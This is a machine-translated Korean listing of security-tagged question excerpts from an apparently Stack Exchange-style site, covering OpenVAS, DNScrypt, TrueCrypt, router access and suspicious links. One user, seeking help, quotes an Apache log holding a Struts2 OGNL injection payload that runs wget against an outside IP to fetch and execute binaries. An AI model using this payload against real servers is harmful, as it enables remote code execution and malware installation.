«security» 태그된 질문

도난 또는 데이터 파괴와 같은 위협으로부터 컴퓨터 시스템 및 정보를 보호합니다.

1
Backtrack 5 r3에서 OpenVAS 5로 로컬 보안 검사 수행
Backtrack5r3 컴퓨터의 원격 컴퓨터에서 OpenVAS를 사용하여 로컬 보안 검사를 수행하려고합니다. 공식 OpenVAS 가이드 Howto : 로컬 보안 검사 수행을 따르고 Backtrack 컴퓨터에서 원격 컴퓨터에 대한 암호를 사용하거나 사용하지 않고 SSH를 통한 연결이 작동하는지 확인했습니다. 그러나 OpenVAS에서 작업을 시작하고 Wireshark를 사용하여 네트워크 트래픽을 모니터링하면 SSH 프로토콜을 사용하는 패킷이 전혀 없다는 것을 …
0
DNScrypt가 제대로 작동합니까? ESET 차단
Windows 7에 DNScrypt를 설치했으며 dnsleak.com의 테스트에서 DNS 요청을 다시 라우팅했습니다. 그러나 : ESET AntiVirus가 설치되어 있습니다. 일부 웹 사이트 차단이 포함되어 있습니다. ESET에서 차단 된 웹 사이트로 이동하면 웹 사이트를 열 수 없습니다. TOR 브라우저를 사용하여 열 수 있습니다. 질문 : ESET 차단으로 인해 DNScrypt가 제대로 작동합니까?
0
“보안상의 이유로 프레임은 허용되지 않습니다. 확인을 클릭하여 프레임을 제거하십시오.”: 기능, 버그 또는 맬웨어?
친구 . . . 오랫동안 Chrome을 사용해 왔는데 최근에 보안상의 이유로 프레임이 허용되지 않습니다. 프레임을 제거하려면 확인을 클릭하십시오.라는 팝업이 나타납니다. 로드 된 페이지의 가장자리를 따라 흰색 베젤과 같은 테두리가 표시됩니다. 또한 최근에 Chrome이 특히 이상하게 Google지도를 열 때 이상하게 작동하기 시작합니다. 페이지가로드되기 전에 잠시 동안 중간에 "슬픈 문서"아이콘이있는 빈 페이지가 …
1
TrueCrypt-암호 변경이 효과가 있습니까?
Truecrypt에서 비밀번호 / 암호를 수정할 수 있습니다. 따라서 'foo'또는 64 자 길이의 임의 암호 일 수 있습니다. 이것이 암호화에 어떤 영향을 미칩니 까? 길고 좋은 암호로 전체 디스크 암호화를 수행한다고 가정 해 봅시다. 그런 다음 'foo'로 수정하십시오. 그리고 당신은 돌아갑니다. 비밀번호 자체를 제외한 다른 사항이 있습니까? 항상 강력한 비밀번호를 사용해야합니까? …
1
DIR-615 라우터는 암호로 제어 페이지를 보호해야합니까?
주소에 DIR-615 라우터가 있습니다 192.168.10.1 URL http://192.168.10.1을 열면 로그인 페이지가 나타납니다 그러나 내가 들어가면 http://192.168.10.1/Basic/Wireless.shtml암호를 묻지 않고 제어판에 들어갑니다 . 의도적으로 설계된 것입니까? 라우터 제어판에 들어가도 내부 네트워크로부터 암호로 보호되지 않는 경우 최신 정보 나는 다른 브라우저를 포함한에서 다른 URL의 진입했다 curl및 wget명령 행 유틸리티,하지만 하나의 컴퓨터에서.
1
공격 페이지에 착륙했습니다. 어떻게해야합니까?
Gmail 메시지에서 링크를 클릭하여 뉴스 사이트처럼 보이는 페이지에 도착했습니다. 다음 Gmail 메시지에서 유사한 링크를 클릭하여 "공격 페이지"임을 경고하는 페이지에 도착했습니다. https://docs.google.com/open?id=0B-mMfXyy8lylSkZTY2hNZG8zNUk 이제 클릭 한 첫 번째 링크가 동일한 이메일 주소에서 나에게 전송되었으므로 이미 '공격 페이지'를 입력했습니다. 컴퓨터가 공격을 받았는지 어떻게 확인할 수 있습니까?
2
시도 된 공격을 발견했습니다. 어떻게해야합니까? [닫은]
일부 Apache 로그를보고 공격으로 보이는 것을 발견했습니다. core:error] [pid 20356] (36)File name too long: [client xxx.xxx.xxx.xxx:56856] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context). (#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)). (#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()). (#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime(). exec('uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop) &&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 …
4
서버가 "하드 드라이브 폭탄"의 위험이 있습니까?
그는 내 홈 서버의 보안을 친구와 논의하면서 SSH 액세스를 통해 파일을 작성하고 파일을 삭제할 수 있으며 무한정으로 인해 하드 드라이브가 손상 될 수 있다고 지적했습니다. 이론적으로 이것은 시스템의 모든 부분에 대한 쓰기 권한을 가진 사람이라면 누구나 가능하다는 것을 깨달았습니다. 그런 다음 액세스 로그를 작성하는 서버를 스팸으로 전송하여 동일한 작업을 수행 …
1
사용자가 dreamweaver 템플릿을 수정하지 못하게 할 수 있습니까?
Dreamweaver 템플릿에 대해 읽은 내용에 따르면 작성자는 템플릿의 편집 가능한 영역을 설정 한 다음 사용자는 잠긴 영역이 아니라 해당 영역 만 편집 할 수 있습니다. 그러나 악의적 인 사용자가 템플릿 자체를 열어 변경하지 못하게하려면 어떻게해야합니까? 예를 들어 폴더 권한을 사용하여이 분리를 시행 할 수는 있지만 Dreamweaver 자체에 어떤 종류의 인증 …
1
localhost의 이메일에 TLS를 사용해야합니까?
SMTP를 사용하여 이메일을 보내고 이메일 서버와 동일한 시스템에서 실행되는 응용 프로그램 (PHP로 작성)이 있습니다. TLS를 사용하는 서버의 외부 IP에서 포트 587이 아닌 로컬 호스트에서 포트 25를 사용하는 것에 대한 보안 문제가 있습니까? 감사
1
Chrome에서 자바 스크립트 허용 목록을 내보내려면 어떻게해야하나요?
보안상의 이유로 Chrome에서 자바 스크립트를 사용 중지하고 "신뢰할 수있는"사이트의 화이트리스트를 사용합니다. 따라서 웹을 서핑하고 있고 신뢰할 수있는 사이트를 방문하면 해당 목록에 추가합니다. 어쩌면 세상에서 가장 좋은 방법은 아니지만 모두를 허용하는 것보다 낫습니다. Google은 나중에 자바 스크립트 허용 목록을 유지하여 나중에 내보낼 수 있습니까? 웹 사이트의 자바 스크립트를 관리하기위한 더 나은 …
1
strace 로그를 제 3 자에게 보내는 것이 안전합니까?
원격 장비에 액세스하는 콘솔 인 특정 소프트웨어가 있습니다. 때때로 UI가 너무 느려지기 시작합니다 (자원 부족 때문이 아니라 해당 프로그램의 일부 버그 때문에). 개발자는 그 순간 그에게 strace 로그를 제공하도록 요청했습니다. 그런 로그를 작성했지만 지금은 제 3 자에게 제공 할 수없는 개인 데이터 (로그인, 암호, ips)가 있는지 걱정하고 있습니다. 그래서 내 …
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.